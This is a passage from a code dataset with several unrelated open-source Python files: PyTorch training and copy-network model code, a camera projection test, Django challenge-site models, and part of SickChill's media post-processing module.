\".txt\"), \"rb\"))\n print(\"Loaded epoch loss history for previous training of cross validation model...\")\n else:\n print(\"Loaded epoch loss history for previous training of model...\")\n epochLossHistory = pickle.load(open(os.path.join(path, \"Models\", organ, modelType.lower() + \"_\" + \"epochLossHistory.txt\"), 'rb')) \n except:\n \n epochLossHistory = []\n else:\n current_epoch=0 \n\n trainLossHistory = [] \n model.to(device) #put the model onto the GPU \n optimizer = torch.optim.Adam(model.parameters(), lr)\n\n \n dataFiles = sorted(os.listdir(dataFolder))\n\n #set transform = transform for data augmentation, None for no augmentation\n if dataAugmentation == True:\n transform = A.Compose ([\n A.OneOf([A.Perspective(scale=(0.05,0.1), keep_size = True, pad_mode = 0, fit_output = True, p=0.5), A.ElasticTransform(p=0.5, alpha=16, sigma=512*0.05, alpha_affine=512*0.03),\n #A.GaussNoise(var_limit = 0.05, p = 0.5)\n ], p =0.5),\n #A.OneOf([A.VerticalFlip(p=0.5), A.HorizontalFlip(p=0.5), A.Rotate(5, p=0.5)], p=0.5)\n ])\n else:\n transform = None\n\n \n iteration = 0\n #Criterion = F.binary_cross_entropy_with_logits()#nn.BCEWithLogitsLoss() I now just define this in the model\n epoch_range = range(current_epoch, numEpochs)\n for epoch in epoch_range:\n print(f\"Beginning epoch {epoch} of a \" + modelType + \" \" + organ + \" model\") \n model.train() #put model in training mode\n\n #creates the training dataset \n #set transform = transform for data augmentation, None for no augmentation\n train_dataset = CTDataset(dataFiles = dataFiles, root_dir = dataFolder, transform = transform)\n\n #creates the training dataloader \n train_loader = DataLoader(dataset = train_dataset, batch_size = 1, shuffle = True)\n\n \n #go through all of the images in the data set \n for i, (image, mask) in enumerate(train_loader): \n \n image.requires_grad=True #make sure they have a gradient for training\n mask.requires_grad=True\n\n image = image.to(device)\n mask = mask.to(device)\n\n loss = model.trainingStep(image,mask) #compute the loss of training prediction\n\n trainLossHistory.append(loss.item())\n loss.backward() #backpropagate\n optimizer.step()\n optimizer.zero_grad()\n\n # if iteration % 10 == 9:\n # print(\"Epoch # \" + str(epoch + 1) + \" --- \" + \"training on image #: \" + str(iteration+1))\n if iteration % 100 == 99:\n print(\"Epoch # \" + str(epoch + 1) + \" --- \" + \"training on image #: \" + str(iteration+1) + \" --- last 100 loss: \" + str(sum(trainLossHistory[-100:])/100))\n iteration += 1 \n \n #end of epoch: check validation loss and\n #Save the model:\n epoch_val = str(epoch) if epoch > 9 else \"0\" + str(epoch)\n if type(cross_val_idx) == int:\n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(cross_val_idx) + \"_\" + epoch_val + \".pt\"))\n else: \n model_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + epoch_val + \".pt\"))\n torch.save(model.state_dict(), model_path) \n \n #for param_tensor in UNetModel.state_dict():\n # print(param_tensor, \"\\t\", UNetModel.state_dict()[param_tensor].size())\n #if param_tensor == \"multiresblock9.conv2d_bn_5x5.conv1.bias\":\n # print(UNetModel.state_dict()[0])\n\n #print(UNetModel.state_dict()[\"multiresblock1.conv2d_bn_1x1.conv1.weight\"])\n\n #dictionary = UNetModel.state_dict()\n\n #for key in dictionary:\n # print(key)\n\n #make a list of the hyperparameters and their labels \n hyperparameters = []\n\n hyperparameters.append([\"Model\", modelType])\n hyperparameters.append([\"Learning Rate\", lr])\n hyperparameters.append([\"Epochs Completed\", epoch])\n hyperparameters.append([\"Optimizer\", \"Adam\"])\n hyperparameters.append([\"Batch Size\", \"1\"])\n hyperparameters.append([\"Loss Function\", \"BCEWithLogitsLoss\"])\n if dataAugmentation == True:\n hyperparameters.append([\"Data Augmentation\", \"On\"])\n else:\n hyperparameters.append([\"Data Augmentation\", \"Off\"])\n\n #save the hyperparameters\n with open(os.path.join(path, \"Models/\" + organ + \"/HyperParameters_Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \".txt\"), \"wb\") as fp:\n pickle.dump(hyperparameters, fp)\n\n epochLoss = Validate(organ, model, path) #validation step\n epochLossHistory.append(epochLoss)\n print('Epoch # {}, Loss: {}'.format(epoch+1, epochLoss)) \n #reshape to have batch dimension in front\n \n #save the losses\n with open(os.path.join(path,\"Models\", organ, modelType.lower() + \"_\" + \"epochs\" + \".txt\"), \"wb\") as fp:\n pickle.dump(epoch, fp) \n if type(cross_val_idx) == int:\n with open(os.path.join(path, \"Models\", organ, \"CV\" + str(cross_val_idx) + \"_\" + modelType.lower() + \"_\" + \"epochLossHistory\" + \".txt\"), \"wb\") as fp:\n pickle.dump(epochLossHistory, fp) \n else:\n with open(os.path.join(path, \"Models\", organ, modelType.lower() + \"_\" + \"epochLossHistory\" + \".txt\"), \"wb\") as fp:\n pickle.dump(epochLossHistory, fp) \n \n #Now get model with lowest epoch loss and save to main model directory\n # min_loss_idx = epochLossHistory.index(min(epochLossHistory))\n # epoch_val = str(min_loss_idx) if min_loss_idx > 9 else \"0\" + str(min_loss_idx)\n # print(f\"Lowest validation loss found during the {min_loss_idx+1}th epoch. Saving this model to the main organ model directory.\")\n # if type(cross_val_idx) == int:\n # model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(cross_val_idx) + \"_\" + epoch_val + \".pt\"))\n # else: \n # model_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + epoch_val + \".pt\"))\n # model.load_state_dict(torch.load(model_path))\n # torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n \n\n epoch_val=str(numEpochs-1)\n if type(cross_val_idx) == int:\n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(cross_val_idx) + \"_\" + str(epoch_val) + \".pt\"))\n else: \n model_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + str(epoch_val) + \".pt\"))\n model.load_state_dict(torch.load(model_path))\n torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n\ndef Validate(organ, model, path=None):\n \"\"\"Computes the average loss of the model on the validation data set. \n\n Args:\n organ (str): the organ to train the model on \n model (Module): the model to find the validation loss on\n\n Returns:\n float: the average loss on the entire validation data set\n\n \"\"\"\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model.to(device)\n model = model.eval()\n dataPath = 'Processed_Data/' + organ + \"_Val/\"\n dataFolder = os.path.join(path, dataPath)\n dataFiles = sorted(os.listdir(dataFolder))\n lossHistory = []\n print('Validating')\n\n #creates the validation dataset \n val_dataset = CTDataset(dataFiles = dataFiles, root_dir = dataFolder, transform = None)\n\n #creates the validation dataloader \n val_loader = DataLoader(dataset = val_dataset, batch_size = 1, shuffle = True)\n iteration = 0 \n for i, (image, mask) in enumerate(val_loader):\n\n #validation does not require gradient calculations, turned off to reduce memory use \n with torch.no_grad():\n image = image.to(device)\n mask = mask.to(device)\n \n loss = model.validationStep(image,mask)\n lossHistory.append(loss.item())\n if iteration % 100 == 99:\n print(\"Validating on the \" + str(iteration + 1) + \"th image.\")\n iteration += 1 \n\n return sum(lossHistory) / len(lossHistory) \n\n \n \n \n","repo_name":"samplecm/Organogenesis","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":27624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17545517748","text":"from torch import nn\nimport torch.nn.functional as F\nimport torch\nimport math\nfrom gnn_transformer import Encoder, Decoder\n\nclass CopyNet(nn.Module):\n def __init__(self, args):\n super(CopyNet, self).__init__()\n self.embedding_size = args.embedding_dim\n self.LinearSource = nn.Linear(self.embedding_size, self.embedding_size, bias=False)\n self.LinearTarget = nn.Linear(self.embedding_size, self.embedding_size, bias=False)\n self.LinearRes = nn.Linear(self.embedding_size, 1)\n self.LinearProb = nn.Linear(self.embedding_size, 2)\n def forward(self, source, traget):\n sourceLinear = self.LinearSource(source)\n targetLinear = self.LinearTarget(traget)\n genP = self.LinearRes(F.tanh(sourceLinear.unsqueeze(1) + targetLinear.unsqueeze(2))).squeeze(-1)\n prob = F.softmax(self.LinearProb(traget), dim=-1)\n return genP, prob\n\n\n\nclass TransModel(nn.Module):\n def __init__(self, args):\n super(TransModel, self).__init__()\n self.embedding_dim = args.embedding_dim\n self.vocab_size = args.vocab_size\n self.sou_len = args.sou_len\n self.sub_token_len = args.sub_token_len\n \n self.encoder = Encoder(args, pad_token_id=0)\n self.decoder = Decoder(args, pad_token_id=0)\n self.out_fc = nn.Linear(args.embedding_dim, args.vocab_size)\n self.gate_fc = nn.Linear(args.embedding_dim, 1)\n self.copy_net = CopyNet(args)\n \n def forward(self, sou, tar, attr, mark, ast_change, edge, tar_label, sub_token, stage = 'train'):\n # source:batch * source_len\n # target: batch * target_len\n\n sou_mask = sou != 0\n tar_mask_pad = tar != 0\n sub_token_mask = sub_token != 0 \n\n sou_embedding, sub_token_embedding = self.encoder(sou, sou_mask, attr, mark, ast_change, edge, sub_token)\n\n sou_embedding = torch.cat((sou_embedding, sub_token_embedding), dim=1)\n # batch * (diff len + sub len) * embedding\n sou_mask = torch.cat((sou_mask, sub_token_mask), dim=1)\n \n tar_embedding = self.decoder(tar, sou_embedding, sou_mask, tar_mask_pad)\n # batch * tar_len * embedding\n tar_output_gen = self.out_fc(tar_embedding)\n # batch * tar_len * tar_vocab_size\n tar_output_gen = F.softmax(tar_output_gen, dim=-1)\n\n tar_output_copy, gate = self.copy_net(sou_embedding, tar_embedding)\n # batch * tar_len * (diff len + sub len)\n # batch * tar_len * 2\n tar_output_copy = torch.masked_fill(tar_output_copy, sou_mask.unsqueeze(1) == 0, -1e9)\n tar_output_copy = F.softmax(tar_output_copy, dim=-1)\n\n tar_output = torch.cat((gate[:,:,0].unsqueeze(-1) * tar_output_gen, gate[:,:,1].unsqueeze(-1) * tar_output_copy), dim=-1)\n # batch * tar_len * (vocab size + diff len + sub len)\n \n # print(torch.sum(tar_output,dim=-1))\n\n tar_output = torch.log(tar_output.clamp(min=1e-10, max=1)) \n\n pads = torch.zeros(tar_label.size(0),1) \n if torch.cuda.is_available():\n label = torch.cat([tar_label, pads.cuda(sou.device)], dim=-1)\n else:\n label = torch.cat([tar_label, pads], dim=-1)\n\n label = label[:,1:]\n label = label.long()\n mask = label != 0\n \n loss = F.nll_loss(tar_output.view(-1, self.vocab_size + self.sou_len + self.sub_token_len), label.contiguous().view(-1), reduction = 'none')\n loss = loss.masked_fill(mask.view(-1)==False, 0)\n if stage == 'train':\n return loss.sum(), mask.sum()\n elif stage == 'dev' or stage == 'test':\n return torch.argmax(tar_output, dim=-1)","repo_name":"DJjjjhao/FIRA-ICSE","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"37"} +{"seq_id":"16036761313","text":"import cv2\nimport numpy as np\nimport utils\nnp.random.seed(79)\nnp.set_printoptions(precision=4)\n\npts = np.random.randint(11, 50, size=(5, 3)) # 5-points\nK = np.load(\"../camMatrix_720p.npy\")\n\nX_cam1 = np.asarray([10, 25, 7]).reshape(3, -1)\nR1 = utils.rotate(thetax=90)\n\n# then t shall be\nt1 = -R1.dot(X_cam1)\n\nprint(\"-Rtranspose.t ie Cam centre is \", -R1.T.dot(t1)) #getting the x-cam is simply -R.inv().t since t = -R.X_cam\n\n# let's create the 3x4-Projection-matrix \nP1 = utils.P_from_krt(K, R1, t1)\nprint(\"Projection-Mat 1 is \", P1)\n\n\npts_2d = utils.project(P1, pts)\n\n\nprint(\"Finally points are \", pts_2d)\n \n\n\n","repo_name":"ChetanPatil28/3d_geometry","sub_path":"projection/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18192392804","text":"import os\nimport uuid\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.fields import GenericRelation\n\nfrom apps.game.tasks import handle_submission\nfrom .game import Game\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _, ugettext\nfrom apps.accounts.models import Team\n# from apps.game.models.competition import Participant\n\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Challenge(models.Model):\n title = models.CharField(max_length=256)\n description = models.CharField(max_length=2048)\n start_time = models.DateTimeField()\n end_time = models.DateTimeField()\n registration_start_time = models.DateTimeField()\n registration_end_time = models.DateTimeField()\n registration_open = models.BooleanField()\n team_size = models.IntegerField()\n entrance_price = models.IntegerField() # In Toomans, 0 for free\n game = models.ForeignKey(Game)\n is_submission_open = models.BooleanField(null=False, blank=False, default=False)\n\n scoreboard_freeze_time = models.DateTimeField(null=True, blank=True)\n\n def __str__(self):\n return self.title\n\n def can_register(self):\n return self.registration_open # and (current time between reg_start_time and reg_end_time)\n\n def open_registration(self):\n self.registration_open = True\n self.save()\n\n def close_registration(self):\n self.registration_open = False\n self.save()\n\n\nclass TeamParticipatesChallenge(models.Model):\n team = models.ForeignKey(Team, related_name='challenges')\n challenge = models.ForeignKey(Challenge, related_name='teams')\n allow_random = models.NullBooleanField(blank=True, null=True)\n\n @property\n def should_pay(self):\n return self.challenge.entrance_price > 0\n\n @property\n def has_paid(self):\n from apps.billing.models import Transaction\n return Transaction.objects.filter(team=self, status='v').exists()\n\n @property\n def is_complete(self):\n users = UserAcceptsTeamInChallenge.objects.filter(\n team=self)\n return users.count() >= self.challenge.team_size and not list(filter(lambda x: not x.user.profile.is_complete, users))\n\n class Meta:\n unique_together = ('team', 'challenge')\n verbose_name_plural = 'Team Participates In Challenges'\n\n def __str__(self):\n team_name = ugettext('None')\n if self.team is not None:\n team_name = str(self.team)\n challenge_name = ugettext('None')\n if self.challenge is not None:\n challenge_name = str(self.challenge)\n return ugettext('Team: ') + team_name + ' ' + ugettext('Challenge: ') + challenge_name\n\n def all_members_accepted(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n user_participations = self.team.participants.all()\n ok = True\n for user_participation in user_participations:\n ok &= UserAcceptsTeamInChallenge.objects.filter(team=self, user=user_participation.user).exists()\n return ok\n\n def get_final_submission(self):\n \"\"\"\n :rtype: TeamSubmission\n \"\"\"\n try:\n return TeamSubmission.objects.filter(team=self, is_final=True).first()\n except TeamSubmission.DoesNotExist:\n return None\n\n def itself(self):\n return self.get_final_submission()\n\n def has_submitted(self):\n return self.get_final_submission() is not None\n\n\nclass UserAcceptsTeamInChallenge(models.Model):\n team = models.ForeignKey(TeamParticipatesChallenge, related_name='users_acceptance')\n user = models.ForeignKey(User, related_name='accepted_teams')\n\n class Meta:\n unique_together = ('team', 'user')\n\n\ndef get_submission_file_directory(instance, filename):\n return os.path.join(instance.team.id.__str__(), filename + uuid.uuid4().__str__() + '.zip')\n\n\nclass TeamSubmission(models.Model):\n LANGUAGE_CHOICES = (\n ('cpp', _('C++')),\n ('java', _('Java')),\n ('py3', _('Python 3'))\n )\n\n STATUS_CHOICES = (\n ('uploading', _('Uploading')),\n ('uploaded', _('Uploaded')),\n ('compiling', _('Compiling')),\n ('compiled', _('Compiled')),\n ('failed', _('Failed'))\n )\n\n team = models.ForeignKey(TeamParticipatesChallenge, related_name='submissions')\n file = models.FileField(upload_to=get_submission_file_directory)\n time = models.DateTimeField(auto_now_add=True)\n is_final = models.BooleanField(default=False)\n language = models.CharField(max_length=128, choices=LANGUAGE_CHOICES, default='java')\n status = models.CharField(max_length=128, choices=STATUS_CHOICES, default='uploading')\n infra_compile_message = models.CharField(max_length=1023, null=True, blank=True)\n infra_token = models.CharField(max_length=256, null=True, blank=True, unique=True)\n infra_compile_token = models.CharField(max_length=256, null=True, blank=True, unique=True)\n\n def __str__(self):\n return str(self.id) + ' team: ' + str(self.team) + ' is final: ' + str(self.is_final)\n\n def set_final(self):\n \"\"\"\n Use this method instead of changing the is_final attribute directly\n This makes sure that only one instance of TeamSubmission has is_final flag set to True\n \"\"\"\n if self.status != 'compiled':\n raise ValueError(_('This submission is not compiled yet.'))\n TeamSubmission.objects.filter(is_final=True, team=self.team).update(is_final=False)\n self.is_final = True\n self.save()\n\n def itself(self):\n return self\n\n def handle(self):\n if settings.TESTING:\n try:\n self.upload()\n self.compile()\n except Exception as error:\n logger.error(error)\n else:\n handle_submission.delay(self.id)\n\n def upload(self):\n from apps.game import functions\n self.infra_token = functions.upload_file(self.file)\n self.status = 'uploaded'\n self.save()\n\n def compile(self):\n from apps.game import functions\n result = functions.compile_submissions([self])\n if result[0]['success']:\n self.status = 'compiling'\n self.infra_compile_token = result[0]['run_id']\n else:\n logger.error(result[0][self.infra_token]['errors'])\n self.save()\n","repo_name":"SharifAIChallenge/aic_site","sub_path":"apps/game/models/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"13089618898","text":"import glob\nimport logging\nimport os\nimport re\nimport stat\nimport subprocess\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from processTV import ParseResult\n from sickchill.tv import TVShow\n\nfrom guessit import guessit\n\nimport sickchill.helper.common\nimport sickchill.oldbeard.subtitles\nfrom sickchill import adba, logger, settings\nfrom sickchill.helper.common import episode_num, get_extension, is_rar_file, remove_extension, replace_extension, SUBTITLE_EXTENSIONS\nfrom sickchill.helper.exceptions import EpisodeNotFoundException, EpisodePostProcessingFailedException, ShowDirectoryNotFoundException\nfrom sickchill.show.History import History\nfrom sickchill.show.Show import Show\n\nfrom . import common, db, helpers, notifiers, show_name_helpers\nfrom .helpers import verify_freespace\nfrom .name_parser.parser import InvalidNameException, InvalidShowException, NameParser\n\nMETHOD_COPY = \"copy\"\nMETHOD_MOVE = \"move\"\nMETHOD_HARDLINK = \"hardlink\"\nMETHOD_SYMLINK = \"symlink\"\nMETHOD_SYMLINK_REVERSED = \"symlink_reversed\"\n\nPROCESS_METHODS = [METHOD_COPY, METHOD_MOVE, METHOD_HARDLINK, METHOD_SYMLINK, METHOD_SYMLINK_REVERSED]\n\n\nclass PostProcessor(object):\n \"\"\"\n A class which will process a media file according to the post processing settings in the config.\n \"\"\"\n\n EXISTS_LARGER = 1\n EXISTS_SAME = 2\n EXISTS_SMALLER = 3\n DOESNT_EXIST = 4\n\n IGNORED_FILESTRINGS = [\".AppleDouble\", \".DS_Store\"]\n\n def __init__(self, directory, release_name=None, process_method=None, is_priority=None):\n \"\"\"\n Creates a new post processor with the given file path and optionally an NZB name.\n\n directory: The path to the folder to be processed\n release_name: The name of the release which resulted in this file being downloaded (optional)\n \"\"\"\n # absolute path to the folder that is being processed\n self.folder_path = os.path.dirname(os.path.abspath(directory))\n\n # full path to file\n self.directory = directory\n\n # file name only\n self.filename = os.path.basename(directory)\n\n # the name of the folder only\n self.folder_name = os.path.basename(self.folder_path)\n\n # name of the release that resulted in this folder\n self.release_name = release_name\n\n self.process_method = process_method if process_method else settings.PROCESS_METHOD\n\n self.in_history = False\n\n self.release_group = None\n\n self.is_proper = False\n\n self.is_priority = is_priority\n\n self.log = \"\"\n\n self.version = None\n\n self.anidbEpisode = None\n\n self.history = History()\n\n def _log(self, message, level=logging.INFO):\n \"\"\"\n A wrapper for the internal logger which also keeps track of messages and saves them to a string for later.\n\n :param message: The string to log (str)\n :param level: The log level to use (optional)\n \"\"\"\n logger.log(level, message)\n self.log += message + \"\\n\"\n\n def _checkForExistingFile(self, existing_file):\n \"\"\"\n Checks if a file exists already and if it does whether it's bigger or smaller than\n the file we are post processing\n\n ;param existing_file: The file to compare to\n\n :return:\n DOESNT_EXIST if the file doesn't exist\n EXISTS_LARGER if the file exists and is larger than the file we are post processing\n EXISTS_SMALLER if the file exists and is smaller than the file we are post processing\n EXISTS_SAME if the file exists and is the same size as the file we are post processing\n \"\"\"\n\n if not existing_file:\n self._log(_(\"There is no existing file so there's no worries about replacing it\"), logger.DEBUG)\n return PostProcessor.DOESNT_EXIST\n\n # if the new file exists, return the appropriate code depending on the size\n if os.path.isfile(existing_file):\n # see if it's bigger than our old file\n if os.path.getsize(existing_file) > os.path.getsize(self.directory):\n self._log(_(\"File {existing_file} is larger than {directory}\").format(existing_file=existing_file, directory=self.directory), logger.DEBUG)\n return PostProcessor.EXISTS_LARGER\n\n elif os.path.getsize(existing_file) == os.path.getsize(self.directory):\n self._log(_(\"File {existing_file} is the same size as {directory}\").format(existing_file=existing_file, directory=self.directory), logger.DEBUG)\n return PostProcessor.EXISTS_SAME\n\n else:\n self._log(_(\"File {existing_file} is smaller than {directory}\").format(existing_file=existing_file, directory=self.directory), logger.DEBUG)\n return PostProcessor.EXISTS_SMALLER\n\n else:\n self._log(_(\"File {existing_file} doesn't exist so there's no worries about replacing it\").format(existing_file=existing_file), logger.DEBUG)\n return PostProcessor.DOESNT_EXIST\n\n def list_associated_files(self, file_path, subtitles_only=False, subfolders=False, rename=False):\n \"\"\"\n For a given file path searches for files with the same name but different extension and returns their absolute paths\n\n :param file_path: The file to check for associated files\n :return: A list containing all files which are associated to the given file\n \"\"\"\n\n if not file_path:\n return []\n\n file_path_list_to_allow = []\n file_path_list_to_delete = []\n\n if subfolders:\n base_name = Path(file_path).stem\n else:\n base_name = remove_extension(file_path)\n\n # don't strip it all and use cwd by accident\n if not base_name:\n return []\n\n path_file = Path(file_path)\n dirname = path_file.parent\n\n # subfolders are only checked in show folder, so names will always be exactly alike\n if subfolders:\n file_list = list(str(found) for found in dirname.rglob(glob.escape(f\"{path_file.stem}\") + \"*\"))\n # this is called when PP, so we need to do the filename check case-insensitive\n else:\n file_list = list(str(found) for found in dirname.glob(glob.escape(f\"{path_file.stem}\") + \"*\"))\n\n for associated_file_path in file_list:\n # Exclude the video file we are post-processing\n if os.path.abspath(associated_file_path) == os.path.abspath(file_path):\n continue\n\n # If this is a renaming action in the show folder, we don't need to check anything, just add it to the list\n if rename:\n file_path_list_to_allow.append(associated_file_path)\n continue\n\n # Exclude non-subtitle files with the 'subtitles_only' option\n if subtitles_only and not associated_file_path.endswith(tuple(SUBTITLE_EXTENSIONS)):\n continue\n\n # Exclude .rar files from associated list\n if is_rar_file(associated_file_path):\n continue\n\n # Define associated files (all, allowed, and non-allowed)\n if os.path.isfile(associated_file_path):\n # check if allowed or not during post-processing\n if settings.MOVE_ASSOCIATED_FILES and associated_file_path.endswith(tuple(settings.ALLOWED_EXTENSIONS.split(\",\"))):\n file_path_list_to_allow.append(associated_file_path)\n elif settings.DELETE_NON_ASSOCIATED_FILES:\n file_path_list_to_delete.append(associated_file_path)\n\n if file_path_list_to_allow or file_path_list_to_delete:\n self._log(\n _(\"Found the following associated files for {file_path}: {allow_and_delete}\").format(\n file_path=file_path, allow_and_delete=file_path_list_to_allow + file_path_list_to_delete\n ),\n logger.DEBUG,\n )\n if file_path_list_to_delete:\n self._log(\n _(\"Deleting non-allowed associated files for {file_path}: {file_path_list_to_delete}\").format(\n file_path=file_path, file_path_list_to_delete=file_path_list_to_delete\n ),\n logger.DEBUG,\n )\n # Delete all extensions the user doesn't allow\n self._delete(file_path_list_to_delete)\n if file_path_list_to_allow:\n self._log(\n _(\"Allowing associated files for {file_path}: {file_path_list_to_allow}\").format(\n file_path=file_path, file_path_list_to_allow=file_path_list_to_allow\n ),\n logger.DEBUG,\n )\n else:\n self._log(_(\"No associated files for {file_path} were found during this pass\").format(file_path=file_path), logger.DEBUG)\n\n return file_path_list_to_allow\n\n def _delete(self, file_path, associated_files=False):\n \"\"\"\n Deletes the file and optionally all associated files.\n\n :param file_path: The file to delete\n :param associated_files: True to delete all files which differ only by extension, False to leave them\n \"\"\"\n\n if not file_path:\n return\n\n # Check if file_path is a list, if not, make it one\n if not isinstance(file_path, list):\n file_list = [file_path]\n else:\n file_list = file_path\n\n # figure out which files we want to delete\n if associated_files:\n file_list += self.list_associated_files(file_path, subfolders=True)\n\n if not file_list:\n self._log(_(\"There were no files associated with {file_path}, not deleting anything\").format(file_path=file_path), logger.DEBUG)\n return\n\n # delete the file and any other files which we want to delete\n for cur_file in file_list:\n if os.path.isfile(cur_file):\n self._log(_(\"Deleting file {cur_file}\").format(cur_file=cur_file), logger.DEBUG)\n # check first the read-only attribute\n file_attribute = os.stat(cur_file)[0]\n if not file_attribute & stat.S_IWRITE:\n # File is read-only, so make it writeable\n self._log(_(\"Read only mode on file {cur_file} Will try to make it writeable\").format(cur_file=cur_file), logger.DEBUG)\n try:\n os.chmod(cur_file, stat.S_IWRITE)\n except Exception:\n self._log(_(\"Cannot change permissions of {cur_file}\").format(cur_file=cur_file), logger.WARNING)\n\n os.remove(cur_file)\n\n # do the library update for synoindex\n notifiers.synoindex_notifier.deleteFile(cur_file)\n\n def _combined_file_operation(self, file_path, new_path, new_base_name, associated_files=False, action=None, subtitles=False):\n \"\"\"\n Performs a generic operation (move or copy) on a file. Can rename the file as well as change its location,\n and optionally move associated files too.\n\n :param file_path: The full path of the media file to act on\n :param new_path: Destination path where we want to move/copy the file to\n :param new_base_name: The base filename (no extension) to use during the copy. Use None to keep the same name.\n :param associated_files: Boolean, whether we should copy similarly-named files too\n :param action: function that takes an old path and new path and does an operation with them (move/copy)\n :param subtitles: Boolean, whether we should process subtitles too\n \"\"\"\n\n if not action:\n self._log(_(\"Must provide an action for the combined file operation\"), logger.ERROR)\n return\n\n file_list = [file_path]\n subfolders = os.path.normpath(os.path.dirname(file_path)) != os.path.normpath(settings.TV_DOWNLOAD_DIR)\n if associated_files:\n file_list += self.list_associated_files(file_path, subfolders=subfolders)\n elif subtitles:\n file_list += self.list_associated_files(file_path, subtitles_only=True, subfolders=subfolders)\n\n if not file_list:\n self._log(_(\"There were no files associated with {file_path}, not moving anything\").format(file_path=file_path), logger.DEBUG)\n return\n\n # deal with all files\n for cur_file_path in file_list:\n path_current_file = Path(cur_file_path)\n cur_extension = get_extension(path_current_file)\n # check if file have subtitles language\n if cur_extension in SUBTITLE_EXTENSIONS and \".\" in path_current_file.stem:\n cur_lang = get_extension(path_current_file.with_suffix(\"\"), lower=True)\n # pt_BR is a special case, subliminal does not handle it well\n if cur_lang == \"pt-br\":\n cur_lang = \"pt-BR\"\n\n # Check that this is a valid subtitle language for this subtitle, and if so prepend the extension with it so it is retained\n cur_lang_name = sickchill.oldbeard.subtitles.from_code(cur_lang).name\n if new_base_name and cur_lang == \"pt-BR\" or cur_lang_name != \"Undetermined\":\n cur_extension = \".\".join((cur_lang, cur_extension))\n\n # replace .nfo with .nfo-orig to avoid conflicts\n if cur_extension == \"nfo\" and settings.NFO_RENAME is True:\n cur_extension = \"nfo-orig\"\n\n # If new base name then convert name\n if new_base_name:\n new_filename = \".\".join((new_base_name, cur_extension))\n # if we're not renaming we still want to change extensions sometimes\n else:\n new_filename = os.path.basename(replace_extension(cur_file_path, cur_extension))\n\n if settings.SUBTITLES_DIR and cur_extension.endswith(tuple(SUBTITLE_EXTENSIONS)):\n subs_new_path = os.path.join(new_path, settings.SUBTITLES_DIR)\n dir_exists = helpers.makeDir(subs_new_path)\n if not dir_exists:\n logger.exception(_(\"Unable to create subtitles folder {subs_new_path}\").format(subs_new_path=subs_new_path))\n else:\n helpers.chmodAsParent(subs_new_path)\n new_file_path = os.path.join(subs_new_path, new_filename)\n else:\n new_file_path = os.path.join(new_path, new_filename)\n\n action(cur_file_path, new_file_path)\n\n def _move(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Move file and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to move the file to\n :param new_base_name: The base filename (no extension) to use during the move. Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def _int_move(cur_file_path, new_file_path):\n self._log(_(\"Moving file from {cur_file_path} to {new_file_path}\").format(cur_file_path=cur_file_path, new_file_path=new_file_path), logger.DEBUG)\n try:\n helpers.moveFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to move file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_move, subtitles=subtitles)\n\n def _copy(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Copy file and set proper permissions\n\n :param file_path: The full path of the media file to copy\n :param new_path: Destination path where we want to copy the file to\n :param new_base_name: The base filename (no extension) to use during the copy. Use None to keep the same name.\n :param associated_files: Boolean, whether we should copy similarly-named files too\n \"\"\"\n\n def _int_copy(cur_file_path, new_file_path):\n self._log(_(\"Copying file from {cur_file_path} to {new_file_path}\").format(cur_file_path=cur_file_path, new_file_path=new_file_path), logger.DEBUG)\n try:\n helpers.copyFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to copy file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n 